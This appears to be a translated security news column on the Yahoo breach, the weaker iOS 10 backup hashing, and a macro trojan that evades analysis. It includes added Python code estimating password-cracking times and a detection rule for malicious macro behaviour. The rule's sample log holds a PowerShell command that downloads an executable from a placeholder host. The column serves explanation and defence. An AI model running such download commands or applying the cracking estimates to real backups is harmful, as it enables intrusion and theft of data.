
What happened to Yahoo? As the British edition of The Register likes to write it: Yahoo! lost! half! a! billion! passwords! last! week! (news; Yahoo's official statement). In the previous installment I briefly mentioned this event, considering it large-scale but not significant enough to dwell on at length. But no. And the point is not that a lot of passwords were stolen: presumably the Yahoo! infrastructure was breached (here, again) back in 2014, and the database has now turned up for sale on the darknet. Compared to other breaches the numbers are impressive, but it has long been known that password protection is an outdated and ineffective tool.
It's interesting how Yahoo and others reacted to this incident. While the breach was being discussed, many interesting details emerged: researchers paid attention to the current state of the infrastructure visible from the outside and admitted that things are not as good as one would like (this week's news). The leaked database held not only passwords but also telephone numbers and other personal information, and some of the passwords were hashed with MD5, an algorithm long recognized as unreliable.
But the most interesting thing in this story is the consequences of a cyber incident for a large public company. Fair reproaches have arisen that Yahoo itself could have been aware of the incident and hid the information (the latter could have happened for a million "good" reasons). The day before yesterday the New York Times, citing anonymous insiders, reported that the company was simply saving money on security tools, including intrusion detection systems.
The list of previous episodes is here.
So much so that the password leak is being discussed in the US Congress, especially since Yahoo itself suggests that the attack was state-sponsored. A number of experts, however, convincingly dispute this assumption: the nature of the attack resembles the similar hacks of LinkedIn and MySpace, in the discussion of which there was far less politics.
Be that as it may, the Yahoo story becomes significant in terms of cyber incident response methods. Breaches happen sooner or later, and it is obvious that we need strategies and tools for detecting and neutralizing them: the faster, the better, and the lower the cost. But that is not all. There is also no established social protocol for disclosing information about a breach, and it would be good to have one. Judging by the experience accumulated so far, maximum openness about the details of the breach (a good example can be found here) and about the steps taken to solve the problem is perceived most positively by everyone involved, including potential victims.
And one more thing. If the situation described in the New York Times did take place, it turns out that Yahoo's management did not only skimp on security investments. Decisions were made that gave priority not to protection but to user convenience, retaining the client base and the like. Budgets are a tricky business and there is never enough money, but the strategy of "they'll all leave us if we reset passwords at every suspicion of a breach" is certainly doomed to failure. By the way, I'm off to change my password.
Apple has reduced the resilience of backups to brute force in iOS 10. No one knows why
News. Elcomsoft blog article.
For unknown reasons, Apple reduced the security of backups in the recently released iOS 10. A backup is a copy of all the data from an iPhone or iPad, stored on the user's computer via iTunes. Backups have been encrypted for quite some time, and the strength of the encryption itself is beyond doubt. What is in doubt is the backups' resistance to brute force. The dispute between Apple and the FBI at the beginning of this year made it clear that breaking into the iPhone itself, if it is protected by the system's standard means, is quite difficult. The backup is an obvious weak link: it is stored on a computer, which in most cases is easier to compromise than the phone itself (even if it is a Mac), and, unlike the phone, does not wipe itself when someone tries to take it apart by illegitimate means. And absolutely everything is stored there, including passwords from the Keychain.

So, according to Oleg Afonin, a specialist at Elcomsoft, the problem is that iOS 10 backups protect the password with a single iteration of SHA-256. In iOS 9, the more robust PBKDF2 algorithm with SHA-1 and 10,000 iterations was used. Elcomsoft specializes in developing software that bypasses the protection of various devices and programs, and according to their data the change of algorithm drastically increases the speed of password guessing: from 150 thousand to 6 million per second. As a result, it is theoretically possible to crack a backup in two days with an 80-90% probability, and that is with a somewhat complex password. If it is very simple, even faster. The experts could not come up with any explanation for such an "upgrade" other than a mistake, which, in fact, Apple itself acknowledged, promising to restore the resistance in the future.
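To make the difference between a single hash pass and a stretched key derivation concrete, here is an added example (my own illustration, not code from the post, Apple or Elcomsoft). It implements both schemes with Python's standard library, measures how much more each guess costs an attacker under PBKDF2 than under a single SHA-256, and turns the two guess rates quoted in the post (150 thousand and 6 million per second) into expected cracking times. The charset, password length and salt handling are assumptions chosen for illustration; the same arithmetic also explains why the unsalted MD5 hashes in the Yahoo database, mentioned above, offer so little protection.

```python
import hashlib
import hmac
import os
import time

# Parameters as the post describes them (assumed here as stated, not verified against Apple's code):
# iOS 9 stretched the backup password with PBKDF2-SHA1 and 10,000 iterations,
# iOS 10 reportedly used a single SHA-256 pass. Guess rates are the ones Elcomsoft quoted.
IOS9_ITERATIONS = 10_000
RATE_IOS9 = 150_000       # guesses per second against PBKDF2 (from the post)
RATE_IOS10 = 6_000_000    # guesses per second against single SHA-256 (from the post)


def single_sha256(password: bytes, salt: bytes) -> bytes:
    """Unstretched scheme: one hash per guess, so the attacker's cost per guess is one SHA-256."""
    return hashlib.sha256(salt + password).digest()


def pbkdf2_sha1(password: bytes, salt: bytes, iterations: int = IOS9_ITERATIONS) -> bytes:
    """Stretched scheme: every guess costs `iterations` HMAC-SHA1 computations."""
    return hashlib.pbkdf2_hmac("sha1", password, salt, iterations, dklen=32)


def verify(stored: bytes, candidate: bytes) -> bool:
    """Constant-time comparison so verification itself leaks nothing about the digest."""
    return hmac.compare_digest(stored, candidate)


def relative_cost(iterations: int = IOS9_ITERATIONS) -> float:
    """How many times slower one PBKDF2 guess is than one single-SHA-256 guess on this machine."""
    pw, salt = b"correct horse", os.urandom(16)
    n_fast, n_slow = 2000, 20
    t0 = time.perf_counter()
    for _ in range(n_fast):
        single_sha256(pw, salt)
    t_single = (time.perf_counter() - t0) / n_fast
    t0 = time.perf_counter()
    for _ in range(n_slow):
        pbkdf2_sha1(pw, salt, iterations)
    t_pbkdf2 = (time.perf_counter() - t0) / n_slow
    return t_pbkdf2 / t_single


def expected_crack_seconds(charset_size: int, length: int, guesses_per_second: float) -> float:
    """Expected time to find a uniformly random password: on average half the keyspace is tried."""
    return (charset_size ** length) / 2 / guesses_per_second


if __name__ == "__main__":
    # Assumed password policy: 8 characters from lowercase letters and digits (36 symbols).
    for label, rate in (("iOS 9 (PBKDF2)", RATE_IOS9), ("iOS 10 (SHA-256)", RATE_IOS10)):
        days = expected_crack_seconds(36, 8, rate) / 86400
        print(f"{label:18s} expected crack time: {days:,.1f} days")
    print(f"PBKDF2 guess costs ~{relative_cost():,.0f}x a single SHA-256 on this machine")
```

The 40x difference between the two quoted rates is what the post's "two days" estimate rests on; the measured `relative_cost()` will typically be far larger than 40 because Elcomsoft's figures come from GPU-optimised tooling, not from a Python loop, but the direction is the same: the iteration count is the only knob that makes each guess expensive.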
Captain Researcher reports on a macro trojan trying to hide from analysis
News
The most popular news on Threatpost this week concerns a malicious program spreading through infected Word documents that uses basic methods to hide its real purpose. A researcher from SentinelOne (an article in their blog) describes a fairly standard situation: a user receives an email with an attachment, the office document opens, a prompt appears asking to enable macros, and the user (of course) says yes or, depending on the locale, "I do". Then things get a little more interesting.
First, the launched malicious code tries to find out, via an external service, the IP address of the machine it is running on and the name of the organization that IP is associated with. If the name matches an entry on a built-in list (consisting mostly of the names of security software vendors, though "the Lab" is not among them), nothing happens. Nothing happens either if a quick search of the system does not turn up a single office document: this is evidently how the code checks whether it has been launched in a virtual machine or simply on a test system. If all the checks pass, a keylogger is downloaded and launched by a PowerShell script.
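The chain just described, a Word macro that spawns PowerShell to fetch a keylogger, is exactly the kind of behaviour a defender can catch from process-creation telemetry regardless of how the macro disguises its intent. Below is an added example of such a detection rule (my own code, not SentinelOne's or any product's), run over a few constructed log lines in an assumed `key="value"` format rather than any vendor's real schema; the parent/child process names and command-line fragments it keys on are the rule's assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Office applications that should rarely, if ever, spawn a script interpreter (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments typical of a stager fetching a second-stage payload (assumed list).
DOWNLOAD_HINTS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|net\.webclient|start-bitstransfer", re.I
)

# Constructed log format (an assumption, not any vendor's schema): key="value" pairs per line.
LINE_RE = re.compile(r'parent="([^"]*)"\s+image="([^"]*)"\s+cmdline="([^"]*)"')


@dataclass
class ProcessEvent:
    parent: str
    image: str
    cmdline: str


def parse_line(line: str) -> Optional[ProcessEvent]:
    """Parse one constructed log line; return None for lines that do not match the format."""
    m = LINE_RE.search(line)
    if not m:
        return None
    parent, image, cmdline = m.groups()
    # Compare on the lower-cased basename so path and case variations do not slip past the rule.
    basename = lambda p: p.rsplit("\\", 1)[-1].lower()
    return ProcessEvent(basename(parent), basename(image), cmdline)


def classify(ev: ProcessEvent) -> Optional[str]:
    """Return a verdict label for a suspicious Office-to-script chain, or None for benign events."""
    if ev.parent not in OFFICE_PARENTS or ev.image not in SCRIPT_CHILDREN:
        return None
    if DOWNLOAD_HINTS.search(ev.cmdline):
        return "office-spawned-script-with-download"  # the macro -> PowerShell -> payload pattern
    return "office-spawned-script"


def scan(lines) -> List[Tuple[str, str, str]]:
    """Run the rule over raw log lines; returns (verdict, child image, cmdline) for each hit."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        verdict = classify(ev)
        if verdict:
            hits.append((verdict, ev.image, ev.cmdline))
    return hits


# Constructed sample events (not real telemetry); example.invalid is a reserved, non-resolving name.
SAMPLE_LOG = [
    'parent="C:\\Program Files\\Microsoft Office\\WINWORD.EXE" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell -w hidden -c (New-Object Net.WebClient).DownloadFile(\'http://example.invalid/k.exe\',\'%TEMP%\\k.exe\')"',
    'parent="C:\\Windows\\explorer.exe" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell Get-Process"',
    'parent="C:\\Program Files\\Microsoft Office\\EXCEL.EXE" image="C:\\Windows\\System32\\cmd.exe" cmdline="cmd /c echo hi"',
    'parent="C:\\Program Files\\Microsoft Office\\WINWORD.EXE" image="C:\\Windows\\splwow64.exe" cmdline="splwow64.exe 12288"',
    "malformed line without the expected fields",
]

if __name__ == "__main__":
    for verdict, image, cmdline in scan(SAMPLE_LOG):
        print(f"[{verdict}] {image}: {cmdline}")
```

The point of the rule is that it does not care about the IP lookup, the vendor-name list or the document-count check: those tricks decide whether the macro runs at all, but once it does, an Office process starting a script interpreter is the observable, and a download verb on that command line is what turns a noisy "script from Office" alert into a high-confidence one. In production the benign parent/child pairs (print spooler helpers such as the fourth sample, add-in installers) are the tuning work.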
These are interesting details of modern malware cobbled together from whatever was at hand, but, frankly, attempting to avoid detection one way or another is a completely common and long-standing practice among malware writers. The only notable point is the use of Word macros in combination with such tricks. Macro malware was only recently resurrected from oblivion by the writers of crypto-ransomware. In this case no one demands a ransom, but it is at least some complication of a fairly simple threat, one which any decent security solution blocks at several stages, at the very least when the keylogger download is attempted.
In fact, such techniques are unlikely to confuse an experienced or simply persistent researcher. More interesting examples of hiding the true purpose of code can be found in the stories about Lurk. Sooner or later the secret comes out. What matters far more is identifying and blocking mimicking malware by automated means. This relies on a lot of very original solutions which, alas, usually remain non-public (here, for example, is one exception), both because of the deep technical specifics and because of an unwillingness to share with cybercriminals the methods for detecting especially cunning malware.

Antiquities
"Typo-867"
Non-resident dangerous virus. Infects .COM files in the standard way. After the infected file finishes running, it leaves in memory a small resident program that replaces some characters typed on the keyboard. While the infected file is running, interrupts 16h, 20h and 21h are hooked.
Quote from the book "Computer Viruses in MS-DOS" by Eugene Kaspersky, 1992, page 86.

Disclaimer: This column reflects only the personal opinion of its author. It may or may not coincide with the position of Kaspersky Lab. As luck would have it.